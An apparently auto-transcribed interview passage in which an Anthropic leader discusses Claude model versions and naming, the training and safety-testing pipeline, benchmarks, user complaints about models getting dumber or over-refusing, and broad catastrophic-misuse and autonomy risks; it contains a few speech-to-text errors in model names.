00:28:59.360 | haiku 3.5, the smallest new model is about as good as Opus 3, the largest old model.
00:29:06.760 | So basically the aim here is to shift the curve.
00:29:09.600 | And then at some point there's going to be an Opus 3.5.
00:29:11.960 | Um, now every new generation of models has its own thing.
00:29:16.240 | They use new data, their personality changes in ways that we kind of, you
00:29:20.840 | know, try to steer, but are not fully able to steer.
00:29:24.240 | And, and so, uh, there's never quite that exact equivalence where the only
00:29:28.280 | thing you're changing is intelligence.
00:29:29.840 | Um, we always try and improve other things and some things change without
00:29:33.360 | us, without us knowing or measuring.
00:29:35.440 | So it's, it's very much an, an exact science in many ways, the manner and
00:29:40.640 | personality of these models is more an art than it is a science.
00:29:43.840 | So what is sort of the reason for, uh, the span of time between say,
00:29:52.080 | uh, cloud Opus 3.0 and 3.5?
00:29:55.800 | What is it, what takes that time if you can speak to it?
00:29:58.400 | Yeah.
00:29:58.640 | So there's, there's different, there's different, uh, processes.
00:30:01.480 | Um, uh, there's pre-training, which is, you know, just kind of the normal
00:30:05.040 | language model training, and that takes a very long time, um, that uses, you
00:30:09.240 | know, these days, you know, tens, you know, tens of thousands, sometimes many
00:30:14.400 | tens of thousands of, uh, GPUs or TPUs or Tranium or, you know, we use different
00:30:20.400 | platforms, but, you know, accelerator chips, um, often, often training for
00:30:25.000 | months, uh, there's then a kind of post-training phase where we do
00:30:30.000 | reinforcement learning from human feedback, as well as other kinds of
00:30:34.120 | reinforcement learning that, that phase is getting, uh, larger and larger now.
00:30:39.280 | And, you know, you know, often that's less of an exact science.
00:30:42.960 | It often takes effort to get it right.
00:30:44.600 | Um, models are then tested with some of our early partners to see how good they
00:30:50.160 | are, and they're then tested both internally and externally for their
00:30:54.760 | safety, particularly for catastrophic and autonomy risks.
00:30:58.400 | Uh, so, uh, we do internal testing according to our responsible scaling
00:31:03.280 | policy, which I, you know, could talk more about that in detail.
00:31:06.200 | And then we have an agreement with the US and the UK AI Safety Institute, as
00:31:11.160 | well as other third-party testers in specific domains to test the models for
00:31:15.920 | what are called CBRN risks, chemical, biological, radiological, and nuclear,
00:31:20.720 | which are, you know, we don't think that models pose these risks seriously yet,
00:31:25.800 | but, but every new model we want to evaluate to see if we're starting to get
00:31:29.040 | close to some of these, these, these more dangerous, um, uh, these
00:31:33.960 | more dangerous capabilities.
00:31:35.440 | So those are the phases.
00:31:37.120 | And then, uh, you know, then, then it just takes some time to get the model
00:31:41.000 | working in terms of inference and launching it in the API.
00:31:44.360 | So there's just a lot of steps to, uh, to actually, to
00:31:48.040 | actually make, you know, model work.
00:31:49.320 | And of course, you know, we're always trying to make the processes
00:31:53.160 | as streamlined as possible, right?
00:31:54.960 | We want our safety testing to be rigorous, but we want it to be
00:31:57.680 | rigorous and to be, you know, to be automatic to happen as fast as it
00:32:02.000 | can without compromising on rigor.
00:32:04.280 | Same with our pre-training process and our post-training process.
00:32:07.720 | So, you know, it's just like building anything else.
00:32:09.840 | It's just like building airplanes.
00:32:11.200 | You want to make them, you know, you want to make them safe, but you
00:32:13.880 | want to make the process streamlined.
00:32:15.640 | And I think the creative tension between those is, is, you know, is an
00:32:18.800 | important thing in making the models work.
00:32:20.360 | Yeah.
00:32:20.840 | A rumor on the street.
00:32:21.920 | I forget who was saying that, uh, Anthropic has really good tooling.
00:32:24.920 | So I, uh, probably a lot of the challenge here is on the software
00:32:29.800 | engineering side is to build the tooling, to, to have a, like a efficient, low
00:32:34.600 | friction interaction with the infrastructure.
00:32:36.320 | You would be surprised how much of the challenges of, uh, you know, building
00:32:41.640 | these models comes down to, you know, software engineering, performance
00:32:46.880 | engineering, you know, you, you, you know, from the outside, you might think,
00:32:50.560 | oh man, we had this Eureka breakthrough, right?
00:32:52.880 | You know, this movie with the science, we discovered it, we figured it out.
00:32:55.760 | But, but, but I think, I think all things, even, even, even, you know,
00:33:00.600 | incredible discoveries, like they, they, they, they, they almost always come
00:33:05.080 | down to the details, um, and, and often super, super boring details.
00:33:09.080 | I can't speak to whether we have better tooling than, than other companies.
00:33:12.040 | I mean, you know, haven't been at those other companies, at
00:33:14.120 | least, at least not recently.
00:33:15.440 | Um, but it's certainly something we give a lot of attention to.
00:33:18.000 | I don't know if you can say, but from three, from cloud three to cloud three,
00:33:23.200 | five, is there any extra pre-training going on as they mostly
00:33:26.680 | focus on the post-training?
00:33:27.720 | There's been leaps in performance.
00:33:29.640 | Yeah, I think, I think at any given stage, we're focused on
00:33:32.800 | improving everything at once.
00:33:34.640 | Um, just, just naturally, like there are different teams.
00:33:37.720 | Each team makes progress in a particular area in, in, in making a particular,
00:33:42.920 | you know, their particular segment of the relay race better.
00:33:45.800 | And it's just natural that when we make a new model, we put, we put
00:33:48.600 | all of these things in at once.
00:33:50.000 | So the data you have, like the preference data you get from RLHF, is that
00:33:55.240 | applicable, is there ways to apply it to newer models as it gets trained up?
00:34:00.560 | Yeah.
00:34:00.920 | Preference data from old models sometimes gets used for new models.
00:34:04.160 | Although of course, uh, it, it performs somewhat better when it's, you know,
00:34:07.640 | trained on, it's trained on the new models.
00:34:09.480 | Note that we have this, you know, constitutional AI method such that
00:34:12.800 | we don't only use preference data.
00:34:14.320 | We kind of, there's also a post-training process where we
00:34:17.040 | train the model against itself.
00:34:18.600 | And there's, you know, new types of post-training the model against
00:34:21.880 | itself that are used every day.
00:34:23.200 | So it's not just RLHF, it's a bunch of other methods as well.
00:34:26.680 | Um, post-training, I think, you know, is becoming more and more sophisticated.
00:34:30.440 | Well, what explains the big leap in performance for the new Sonnet 3.5?
00:34:34.840 | I mean, at least in the programming side, and maybe this is a good
00:34:37.760 | place to talk about benchmarks.
00:34:39.080 | What does it mean to get better?
00:34:40.520 | Just the number went up, but you know, I, I, I program, but I also love
00:34:46.000 | programming and I, um, CLAW 3.5 through cursor is what I use, uh, to assist me
00:34:52.400 | in programming and there was, at least experientially, anecdotally, it's
00:34:57.560 | gotten smarter at programming.
00:35:00.280 | So what, like, what, what does it take to get it, uh, to get it smarter?
00:35:03.520 | We observed that as well, by the way, there were a couple of very strong
00:35:07.400 | engineers here at Anthropic, um, who all previous code models, both produced
00:35:12.200 | by us and produced by all the other companies, hadn't really been useful
00:35:15.840 | to, hadn't really been useful to them.
00:35:17.560 | You know, they said, you know, maybe, maybe this is useful to beginner.
00:35:20.040 | It's not useful to me, but Sonnet 3.5, the original one for the first time,
00:35:25.080 | they said, oh my God, this helped me with something that, you know, that
00:35:27.880 | it would have taken me hours to do.
00:35:29.160 | This is the first model has actually saved me time.
00:35:31.280 | So again, the waterline is rising.
00:35:33.400 | And, and then I think, you know, the new Sonnet has been, has been even better
00:35:36.960 | in terms of what it, what it takes.
00:35:38.640 | I mean, I'll just say it's been across the board.
00:35:41.160 | It's in the pre-training, it's in the post-training, it's in
00:35:44.800 | various evaluations that we do.
00:35:46.880 | We've observed this as well.
00:35:48.600 | And if we go into the details of the benchmark, so SWE Bench is basically,
00:35:53.680 | you know, since, since, you know, since, since you're a programmer, you know,
00:35:56.960 | you'll be familiar with like pull requests and, you know, just, just pull
00:36:01.560 | requests or like, you know, the, like a sort of, a sort of atomic unit of work.
00:36:06.520 | You know, you could say, I'm, you know, I'm implementing one,
00:36:08.680 | I'm implementing one thing.
00:36:10.400 | And, and so SWE Bench actually gives you kind of a real world situation where the
00:36:16.680 | code base is in the current state.
00:36:18.160 | And I'm trying to implement something that's, you know, that's
00:36:20.800 | described in, described in language.
00:36:22.800 | We have internal benchmarks where we, where we measure the same thing.
00:36:25.800 | And you say, just give the model free reign to like, you know, do anything,
00:36:29.880 | run, run, run anything, edit anything.
00:36:32.440 | How, how well is it able to complete these tasks?
00:36:36.040 | And it's that benchmark that's gone from, it can do it 3% of the time to,
00:36:40.480 | it can do it about 50% of the time.
00:36:42.320 | So I actually do believe that if we get, you can gain benchmarks, but I think if
00:36:46.840 | we get to a hundred percent on that benchmark and in a way that isn't kind
00:36:50.120 | of like over-trained or, or, or game for that particular benchmark probably
00:36:54.640 | represents a real and serious increase in kind of, in kind of programming,
00:36:59.320 | programming ability, and, and I would suspect that if we can get to, you know,
00:37:03.720 | 90, 90, 95%, that, that, that, you know, it will, it will represent ability
00:37:09.160 | to autonomously do a significant fraction of software engineering tasks.
00:37:12.680 | Well, ridiculous timeline question.
00:37:15.520 | When is GLADOPUS 3.5 coming out?
00:37:19.320 | Uh, not giving you an exact date, uh, but you know, there, there, uh, you
00:37:24.080 | know, as far as we know, the plan is still to have a CLAWD 3.5 Opus.
00:37:27.480 | Are we going to get it before GTA 6 or no?
00:37:30.360 | Like Duke Nukem forever.
00:37:31.760 | So what was that game that there was some game that was delayed 15 years.
00:37:34.720 | Was that Duke Nukem forever?
00:37:35.960 | Yeah.
00:37:36.320 | And I think GTA is now just releasing trailers.
00:37:39.000 | It, you know, it's only been three months since we released the first SONNET.
00:37:41.840 | Yeah.
00:37:42.760 | It's incredible.
00:37:43.320 | The incredible pace of release.
00:37:44.640 | It just, it just tells you about the pace, the expectations for
00:37:47.680 | when things are going to come out.
00:37:49.040 | So, uh, what about 4.0?
00:37:51.720 | So how do you think about sort of, as these models get bigger
00:37:55.280 | and bigger about versioning?
00:37:56.520 | And also just versioning in general, why SONNET 3.5 updated with the date?
00:38:02.840 | Why not SONNET 3.6, which a lot of people are calling it?
00:38:06.640 | Naming is actually an interesting challenge here, right?
00:38:09.120 | Because I think a year ago, most of the model was pre-training.
00:38:12.600 | And so you could start from the beginning and just say, okay, we're
00:38:15.600 | going to have models of different sizes.
00:38:17.040 | We're going to train them all together.
00:38:18.280 | And, you know, we'll have a family of naming schemes and then we'll
00:38:21.760 | put some new magic into them.
00:38:23.200 | And then, you know, we'll have the next, the next generation.
00:38:26.080 | Um, the trouble starts already when some of them take a lot
00:38:28.920 | longer than others to train, right?
00:38:30.320 | That already messes up your time, time a little bit, but as you make big
00:38:35.000 | improvements in, as you make big improvements in pre-training, uh, then
00:38:39.040 | you suddenly notice, oh, I can make better pre-trained model and that
00:38:42.640 | doesn't take very long to do.
00:38:44.680 | And, but, you know, clearly it has the same, you know, size
00:38:47.520 | and shape of previous models.
00:38:48.840 | Uh, uh, so I think those two together, as well as the timing timing issues,
00:38:53.520 | any kind of scheme you come up with, uh, you know, the reality tends to
00:38:59.400 | kind of frustrate that scheme, right?
00:39:00.960 | It tends to kind of break out of the breakout of the scheme.
00:39:04.200 | It's not like software where you can say, oh, this is like, you
00:39:07.040 | know, 3.7, this is 3.8.
00:39:09.080 | No, you have models with different, different trade-offs.
00:39:12.120 | You can change some things in your models.
00:39:14.040 | You can train, you can change other things.
00:39:16.200 | Some are faster and slower in inference.
00:39:18.240 | Some have to be more expensive.
00:39:19.520 | Some have to be less expensive.
00:39:20.960 | And so I think all the companies have struggled with this.
00:39:23.800 | Um, I think we did very, you know, I think, think we were in a good, good
00:39:28.280 | position in terms of naming when we had Haiku, Sonnet and Opus.
00:39:32.040 | We're trying to maintain it, but it's not, it's not, it's not perfect.
00:39:35.880 | Um, so we'll, we'll, we'll try and get back to the simplicity, but it, it,
00:39:39.600 | um, uh, just the, the, the nature of the field, I feel like no one's figured out
00:39:44.480 | naming, it's somehow a different paradigm from like normal software.
00:39:48.240 | And, and, and so we, we just, none of the companies have been perfect at it.
00:39:52.880 | Um, it's something we struggle with surprisingly much relative to, you know,
00:39:56.960 | how, relative to how trivial it is, you know, for the, the, the, the grand
00:40:01.600 | science of training the models.
00:40:02.840 | So from the user side, the user experience of the updated Sonnet 3.5
00:40:08.400 | is just different than the previous, uh, June, 2024 Sonnet 3.5.
00:40:13.560 | It would be nice to come up with some kind of labeling that embodies that
00:40:17.520 | because people talk about Sonnet 3.5, but now there's a different one.
00:40:22.160 | And so how do you refer to the previous one and the new one?
00:40:24.800 | And it, it, uh, when there's a distinct improvement, it just makes
00:40:30.120 | conversation about it, uh, just challenging.
00:40:34.160 | Yeah.
00:40:34.800 | Yeah, I, I definitely think this question of, there are lots of
00:40:38.640 | properties of the models that are not reflected in the benchmarks.
00:40:42.320 | Um, I, I think, I think that's, that's definitely the case and everyone
00:40:46.200 | agrees and not all of them are capabilities.
00:40:48.320 | Some of them are, you know, models can be polite or brusque.
00:40:53.840 | They can be, uh, you know, uh, very reactive or they can ask you questions.
00:41:00.520 | Um, they can have what, what feels like a warm personality or a cold
00:41:04.480 | personality, they can be boring or they can be very distinctive
00:41:07.800 | like GoldenGate Claude was.
00:41:09.320 | Um, and we have a whole, you know, we have a whole team kind of focused on,
00:41:13.880 | I think we call it Claude character.
00:41:15.480 | Uh, Amanda leads that team and we'll, we'll talk to you about that, but
00:41:19.440 | it's still a very inexact science.
00:41:21.520 | Um, and, and often we find that models have properties that we're not aware of.
00:41:26.680 | The, the fact of the matter is that you can, you know, talk to a model
00:41:30.680 | 10,000 times, and there are some behaviors you might not see.
00:41:34.360 | Uh, just like, just like with a human, right.
00:41:36.640 | I can know someone for a few months and, you know, not know that they have a
00:41:39.680 | certain skill or not know that there's a certain side to them.
00:41:42.720 | And so I think, I think we just have to get used to this idea and we're always
00:41:46.120 | looking for better ways of testing our models to, to demonstrate these
00:41:50.520 | capabilities and, and, and also to decide which are, which are the, which
00:41:54.080 | are the personality properties we want models to have in which we don't want
00:41:58.200 | to have that itself, the normative question is also super interesting.
00:42:02.240 | I got to ask you a question from Reddit, from Reddit.
00:42:04.680 | Oh boy.
00:42:05.760 | You know, there, there's just as fascinating to me, at least it's a
00:42:09.640 | psychological social phenomenon where people report that Claude has
00:42:15.080 | gotten dumber for them over time.
00:42:17.040 | And so, uh, the question is, does the user complaint about the
00:42:21.000 | dumbing down of Claude three, five sonnet hold any water?
00:42:23.920 | So are these anecdotal reports a kind of social phenomena or did Claude, is
00:42:31.320 | there any cases where Claude would get dumber?
00:42:33.040 | So, uh, this actually doesn't apply.
00:42:35.840 | This, this isn't just about Claude.
00:42:37.480 | I believe this, I believe I've seen these complaints for every foundation
00:42:42.880 | model produced by a major company.
00:42:44.480 | Um, people said this about GPT-4, they said it about GPT-4 turbo.
00:42:48.520 | Um, so, so, so a couple of things.
00:42:51.600 | Um, one, the actual weights of the model, right?
00:42:54.600 | The actual brain of the model that does not change unless
00:42:58.240 | we introduce a new model.
00:43:00.040 | Um, there, there are just a number of reasons why it would not make
00:43:03.360 | sense practically to be randomly substituting in, substituting
00:43:07.240 | in new versions of the model.
00:43:09.000 | It's difficult from an inference perspective, and it's actually
00:43:12.000 | hard to control all the consequences of changing the weights of the model.
00:43:16.000 | Let's say you wanted to fine tune the model to be like, I don't know,
00:43:19.360 | to like, to say certainly less, which, you know, an old version
00:43:22.760 | of Sonnet used to do, um, you actually end up changing a hundred things as well.
00:43:26.320 | So we have a whole process for it.
00:43:27.840 | And we have a whole process for modifying the model.
00:43:30.560 | We do a bunch of testing on it.
00:43:31.960 | We do a bunch of, um, like we do a bunch of user testing and early customers.
00:43:36.080 | So it, it, we both have never changed the weights of the model
00:43:40.040 | without, without telling anyone.
00:43:41.560 | And it, it, it wouldn't certainly in the current setup, it
00:43:45.080 | would not make sense to do that.
00:43:46.480 | Now, there are a couple of things that we do occasionally do.
00:43:49.480 | Um, one is sometimes we run A/B tests.
00:43:52.720 | Um, but those are typically very close to when a model is being, is being, uh,
00:43:57.440 | released and for a very small fraction of time.
00:44:00.280 | Um, so, uh, you know, like the, you know, the, the day before the new Sonnet 3.5.
00:44:05.480 | I agree.
00:44:06.440 | We should have had a better name.
00:44:07.960 | It's clunky to refer to it.
00:44:09.400 | Um, there were some comments from people that like, it's got, it's got, it's
00:44:13.040 | gotten a lot better and that's because, you know, a fraction we're exposed
00:44:15.920 | to, to an A/B test for, for those one or for those one or two days.
00:44:20.160 | Um, the other is that occasionally the system prompt will change, um, on the
00:44:24.400 | system prompt can have some effects, although it's on, it's unlikely to dumb
00:44:29.040 | down models, it's unlikely to make them dumber.
00:44:31.320 | Um, and, and, and, and we've seen that while these two things, which I'm
00:44:35.560 | listing to be very complete, um, Happened relatively, happened quite infrequently.
00:44:41.280 | Um, the complaints about, for us and for other model companies about the model
00:44:46.800 | change, the model isn't good at this.
00:44:48.480 | The model got more censored.
00:44:49.720 | The model was dumbed down.
00:44:50.800 | Those complaints are constant.
00:44:52.440 | And so I don't want to say like people are imagining it or anything, but like the
00:44:56.560 | models are for the most part not changing.
00:44:59.600 | Um, if I were to offer a theory, um, I think it actually relates to one of the
00:45:05.320 | things I said before, which is that.
00:45:07.480 | Models have many are very complex and have many aspects to them.
00:45:12.120 | And so often, you know, if I, if I, if I, if I ask the model a question, you know,
00:45:16.640 | if I'm like, if I'm like do task X versus can you do task X, the model
00:45:22.120 | might respond in different ways.
00:45:23.840 | Uh, and, and so there are all kinds of subtle things that you can change about
00:45:28.680 | the way you interact with the model that can give you very different results.
00:45:32.280 | Um, to be clear, this, this itself is like a failing by, by us and by the
00:45:37.240 | other model providers that, that the models are, are just, just often sensitive
00:45:40.960 | to like small, small changes in wording.
00:45:43.400 | It's yet another way in which the science of how these models
00:45:46.640 | work is very poorly developed.
00:45:48.280 | Uh, and, and so, you know, if I go to sleep one night and I was like talking to
00:45:51.760 | the model in a certain way and I like slightly change the phrasing of how I
00:45:55.400 | talk to the model, you know, I could, I could get different results.
00:45:58.600 | So that's, that's one possible way.
00:46:00.680 | The other thing is, man, it's just hard to quantify this stuff.
00:46:03.480 | Uh, it's hard to quantify this stuff.
00:46:05.440 | I think people are very excited by new models when they come out.
00:46:08.400 | And then as time goes on, they, they become very aware of the, they become
00:46:12.520 | very aware of the limitations.
00:46:13.760 | So that may be another effect, but that's, that's all a very long
00:46:16.600 | rendered way of saying for the most part, with some fairly narrow
00:46:20.040 | exceptions, the models are not changing.
00:46:22.440 | I think there is a psychological effect.
00:46:24.360 | You just start getting used to it.
00:46:25.880 | The baseline raises, like when people have first gotten wifi on
00:46:29.400 | airplanes, it's like amazing magic.
00:46:32.120 | Yeah.
00:46:32.400 | And then, and then you start getting this thing to work.
00:46:34.800 | This is such a piece of crap.
00:46:36.640 | Exactly.
00:46:37.480 | So then it's easy to have the conspiracy theory of they're
00:46:39.640 | making wifi slower and slower.
00:46:41.280 | This is probably something I'll talk to Amanda much more about,
00:46:44.680 | but, um, another Reddit question.
00:46:46.880 | Uh, when will Claude stop trying to be my, uh, puritanical
00:46:51.240 | grandmother, imposing it's moral worldview on me as a paying customer.
00:46:55.400 | And also what is the psychology behind making Claude overly apologetic?
00:46:59.080 | So this kind of reports about the experience, a different
00:47:04.200 | angle on the frustration.
00:47:05.160 | It has to do with the character.
00:47:06.080 | Yeah.
00:47:06.360 | So a couple of points on this first one is, um, like things that
00:47:11.040 | people say on Reddit and Twitter or X or whatever it is, um, there's
00:47:15.120 | actually a huge distribution shift between like the stuff that people
00:47:18.640 | complain loudly about on social media.
00:47:20.480 | And what actually kind of like, you know, Statistically users care about.
00:47:24.960 | And that drives people to use the models.
00:47:26.560 | Like people are frustrated with, you know, things like, you know, the
00:47:30.000 | model, not writing out all the code or the model, uh, you know, just,
00:47:34.240 | just not being as good at code as it could be, even though it's the
00:47:37.120 | best model in the world on code.
00:47:38.880 | Um, I, I think the majority of things, of things are about that.
00:47:41.880 | Um, uh, but, uh, certainly a, a, a kind of vocal minority are, uh, you know,
00:47:48.080 | kind of, kind of, kind of raised these concerns, right.
00:47:50.320 | Are frustrated by the model, refusing things that it shouldn't refuse
00:47:53.960 | or like apologizing too much, or just, just having these kind
00:47:57.080 | of like annoying verbal ticks.
00:47:58.800 | Um, the second caveat, and I just want to say this like super clearly,
00:48:02.480 | because I think it's like, some people don't know it, others like kind
00:48:07.120 | of know it, but forget it.
00:48:08.320 | Like it is very difficult to control across the board, how the models behave.
00:48:13.200 | You cannot just reach in there and say, oh, I want the model to like, apologize
00:48:17.920 | less, like you can do that.
00:48:19.360 | You can include trading data that says like, oh, the models should like apologize
00:48:23.240 | less, but then in some other situation, they end up being like super rude or
00:48:27.640 | like overconfident in a way that's like misleading people.
00:48:30.280 | So there, there are all these trade-offs.
00:48:32.320 | Um, uh, for example, another thing is if there was a period during
00:48:36.880 | which models, ours, and I think others as well, were too verbose, right?
00:48:41.720 | They would like repeat themselves.
00:48:43.040 | They would say too much.
00:48:44.120 | Um, you can cut down on the verbosity by penalizing the models
00:48:48.320 | for, for just talking for too long.
00:48:50.160 | What happens when you do that, if you do it in a crude way is when the models
00:48:54.520 | are coding, sometimes they'll say, rest of the code goes here, right?
00:48:58.400 | Because they've learned that that's the way to economize and that they see it.
00:49:01.360 | And then, and then, so that leads the model to be so-called lazy in coding,
00:49:05.160 | where they, where they, where they're just like, ah, you can finish the rest of it.
00:49:08.160 | It's not, it's not because we want to, you know, save on compute or
00:49:12.080 | because, you know, the models are lazy.
00:49:14.000 | And, you know, during winter break or any of the other kind of conspiracy
00:49:17.760 | theories that have, that have, that have come up, it's actually, it's just
00:49:21.040 | very hard to control the behavior of the model, to steer the behavior of the
00:49:25.400 | model in all circumstances at once.
00:49:27.760 | You can kind of, there's this, this whack-a-mole aspect where you push on
00:49:31.680 | one thing and like, you know, these, these, these, you know, these other
00:49:37.040 | things start to move as well that you may not even notice or measure.
00:49:40.160 | And so one of the reasons that I, that I care so much about, you know,
00:49:45.920 | kind of grand alignment of these AI systems in the future is actually,
00:49:49.520 | these systems are actually quite unpredictable.
00:49:51.880 | They're actually quite hard to steer and control.
00:49:54.400 | And this version we're seeing today of you make one thing better,
00:50:00.200 | it makes another thing worse.
00:50:01.680 | Uh, I think that's, that's like a present day analog of future control
00:50:08.760 | problems in AI systems that we can start to study today, right?
00:50:12.200 | I think, I think that, that, that difficulty in, in steering the behavior
00:50:18.720 | and in making sure that if we push an AI system in one direction, it doesn't
00:50:23.040 | push it in another direction in some, in some other ways that we didn't want.
00:50:26.720 | Uh, I think that's, that's kind of an, that's kind of
00:50:29.840 | an early sign of things to come.
00:50:32.120 | And if we can do a good job of solving this problem, right.
00:50:35.040 | Of like you asked the model to like, you know, to like make and distribute
00:50:39.440 | smallpox and it says no, but it's willing to like help you in your
00:50:43.080 | graduate level virology class.
00:50:44.720 | Like, how do we get both of those things at once?
00:50:47.360 | It's hard.
00:50:48.200 | It's very easy to go to one side or the other, and it's
00:50:51.240 | a multidimensional problem.
00:50:52.600 | And so, uh, I, you know, I think these questions of like
00:50:56.080 | shaping the models personality.
00:50:57.960 | I think they're very hard.
00:50:59.760 | I think we haven't done perfectly on them.
00:51:02.440 | I think we've actually done the best of all the AI companies,
00:51:05.400 | but still so far from perfect.
00:51:08.000 | Uh, and I think if we can get this right, if we can control the, the, you
00:51:13.040 | know, control the false positives and false negatives in this, this very
00:51:17.640 | kind of controlled present day environment, we'll be much better
00:51:21.560 | at doing it for the future when our worry is, you know, will the
00:51:24.400 | models be super autonomous?
00:51:26.000 | Will they be able to, you know, make very dangerous things?
00:51:29.320 | Will they be able to autonomously, you know, build whole companies
00:51:32.080 | and are those companies aligned?
00:51:33.480 | So, so I, I think of this, this present task as both vexing, but
00:51:38.120 | also good practice for the future.
00:51:39.520 | What's the current best way of gathering sort of user feedback, like, uh, not
00:51:45.960 | anecdotal data, but just large scale data about pain points or the opposite
00:51:51.720 | of pain points, positive things.
00:51:53.120 | So on, is it internal testing?
00:51:54.720 | Is it a specific group testing, A/B testing?
00:51:57.640 | What, what works?
00:51:58.640 | So, so typically, um, we'll have internal model bashings
00:52:01.920 | where all of Anthropic.
00:52:03.040 | Anthropic is almost a thousand people.
00:52:04.760 | Um, you know, people just, just try and break the model.
00:52:07.320 | They try and interact with it various ways.
00:52:09.440 | Um, uh, we have a suite of evals, uh, for, you know, oh, is the model
00:52:14.480 | refusing in ways that it, that it couldn't, I think we even had a certainly
00:52:18.120 | eval because you know, our, our model, again, one point model had this problem
00:52:23.080 | where like it had this annoying tick where it would like respond to a wide
00:52:26.480 | range of questions by saying, certainly I can help you with that.
00:52:29.440 | Certainly.
00:52:30.360 | I would be happy to do that.
00:52:31.520 | Certainly this is correct.
00:52:33.280 | Um, uh, and so we had a like certainly eval, which is like, how, how
00:52:37.200 | often does the model say certainly.
00:52:38.800 | Uh, uh, but, but look, this is just a whack-a-mole like, like what if it
00:52:42.680 | switches from certainly to definitely like, uh, uh, so you know, every time
00:52:47.880 | we add a new eval and we're, we're always evaluating for all the old things.
00:52:50.920 | So we have hundreds of these evaluations, but we find that there's no substitute
00:52:55.040 | for human interacting with it.
00:52:56.240 | And so it's very much like the ordinary product development process.
00:52:59.480 | We have like hundreds of people within Anthropic bash the model.
00:53:02.920 | Then we do, uh, you know, then we do externally be tests.
00:53:06.960 | Sometimes we'll run tests with contractors.
00:53:09.480 | We pay contractors to interact with the model.
00:53:11.920 | Um, so you put all of these things together and it's still not perfect.
00:53:16.640 | You still see behaviors that you don't quite want to see, right.
00:53:19.080 | You know, you see, you still see the model, like refusing things that it
00:53:22.640 | just doesn't make sense to refuse.
00:53:24.120 | Um, but I, I, I think trying to trying to solve this challenge, right.
00:53:29.080 | Trying to stop the model from doing.
00:53:31.040 | You know, genuinely bad things that, you know, know what everyone
00:53:34.400 | agrees it shouldn't do, right.
00:53:35.640 | You know, everyone, everyone, you know, everyone agrees that, you know, the
00:53:38.640 | model shouldn't talk about, you know, I, I don't know, child abuse material.
00:53:42.440 | Right.
00:53:42.680 | Like everyone agrees the model shouldn't do that.
00:53:44.360 | Uh, but, but at the same time that it doesn't refuse in these dumb and stupid
00:53:48.240 | ways, uh, I think, I think draw drawing that line as finely as possible.
00:53:53.760 | Approaching perfectly is still, is still a challenge and we're
00:53:56.400 | getting better at it every day.
00:53:57.960 | But there's, there's a lot to be solved.
00:53:59.520 | And again, I would point to that as, as an indicator of a challenge ahead in terms
00:54:05.040 | of steering much more powerful models.
00:54:07.680 | Do you think Claude 4.0 is ever coming out?
00:54:10.920 | I don't want to commit to any naming scheme.
00:54:14.040 | Cause if I say, if I say here, we're going to have Claude for next year.
00:54:18.480 | And then, and then, you know, then we decide that like, you know, we
00:54:20.920 | should start over cause there's a new type of model.
00:54:22.800 | Like I, I, I, I don't want to, I don't want to commit to it.
00:54:25.520 | I would expect in a normal course of business that Claude four
00:54:28.840 | would come after Claude 3.5.
00:54:30.480 | But, but you know, you know, you never know in this wacky field.
00:54:33.720 | Right.
00:54:34.080 | But, uh, sort of this idea of scaling is continuing.
00:54:38.200 | Scale, scaling is continuing.
00:54:39.760 | There, there will definitely be more powerful models coming from us
00:54:43.200 | than the models that exist today.
00:54:44.400 | That is, that is certain.
00:54:45.880 | Or if there, if there aren't, we've, we've deeply failed as a company.
00:54:48.560 | Okay.
00:54:49.320 | Can you explain the responsible scaling policy and the AI safety
00:54:53.240 | level standards, ASL levels?
00:54:55.000 | As much as I'm excited about the benefits of these models.
00:54:58.720 | And we know we'll talk about that.
00:55:00.160 | If we talk about machines of loving grace, um, I'm, I'm worried about the risks and
00:55:04.720 | I continue to be worried about the risks.
00:55:06.440 | Uh, no one should think that, you know, machines of loving grace was me, me
00:55:10.280 | saying, uh, you know, I'm no longer worried about the risks of these models.
00:55:14.000 | I think they're two sides of the same coin.
00:55:15.760 | The, the, uh, power of the models and their ability to solve all these
00:55:21.200 | problems in, you know, biology, neuroscience, economic development,
00:55:25.920 | government, governance, and peace, large parts of the economy, those,
00:55:30.080 | those come with risks as well, right?
00:55:31.680 | With great power comes great responsibility, right?
00:55:34.040 | That's the, the two are, the two are paired, uh, things that are powerful
00:55:37.840 | can do good things and they can do bad things.
00:55:39.800 | Um, I think of those risks as, as being in, you know, several
00:55:43.480 | different, different categories.
00:55:44.920 | Perhaps the two biggest risks that I think about, and that's not to say that
00:55:49.000 | there aren't risks today that are, that are important, but when I think of the
00:55:52.160 | really, the, the, you know, the things that would happen on the grandest scale,
00:55:55.680 | um, one is what I call catastrophic misuse.
00:55:59.080 | These are misuse of the models in domains like cyber,
00:56:04.720 | bio, radiological, nuclear, right.
00:56:07.160 | Things that could, you know, that could harm or even kill thousands, even
00:56:13.080 | millions of people, if they really, really go wrong, um, like these are
00:56:16.560 | the number one priority to prevent.
00:56:19.840 | And, and here I would just make a simple observation, which is that.
00:56:23.680 | My, the models, you know, if, if I look today at people who have done
00:56:28.760 | really bad things in the world, um, uh, I think actually humanity has been
00:56:33.520 | protected by the fact that the overlap between really smart, well-educated
00:56:38.320 | people and people who want to do really horrific things has generally been small.
00:56:42.880 | Like, you know, let's say, let's say I'm someone who, you know, uh, you know,
00:56:47.320 | I have a PhD in this field, I have a well-paying job.
00:56:50.160 | Um, there's so much to lose.
00:56:52.360 | Why do I want to like, you know, even, even assuming I'm completely evil,
00:56:56.040 | which, which most people are not, um, why, why, you know, why would such a
00:56:59.560 | person risk their risk, their, you know, risk, their life risk, risk, their,
00:57:03.880 | their legacy, their reputation to, to do something like, you know, truly, truly
00:57:08.400 | evil, if we had a lot more people like that, the world would be
00:57:11.440 | a much more dangerous place.
00:57:13.080 | And so my, my, my worry is that by being a, a much more intelligent
00:57:18.040 | agent, AI could break that correlation.
00:57:20.800 | And so I, I, I, I do have serious worries about that.
00:57:24.160 | I believe we can prevent those worries.
00:57:25.880 | Uh, but you know, I, I think as a counterpoint to machines of loving grace,
00:57:29.800 | I want to say that this is the, I, there's still serious risks and, and the
00:57:33.920 | second range of risks would be the autonomy risks, which is the idea that
00:57:37.840 | models might on their own, particularly as we give them more agency than they've
00:57:42.280 | had in the past, uh, particularly as we give them supervision over wider tasks
00:57:48.080 | like, you know, writing whole code bases or someday even, you know, effectively
00:57:53.880 | operating entire, entire companies.
00:57:56.080 | They're on a long enough leash.
00:57:57.960 | Are they, are they doing what we really want them to do?
00:58:00.480 | It's very difficult to even understand in detail what they're doing,
00:58:04.240 | let alone, let alone control it.
00:58:06.640 | And like I said, this, these early signs that it's, it's hard to perfectly
00:58:11.920 | draw the boundary between things the model should do and things the model
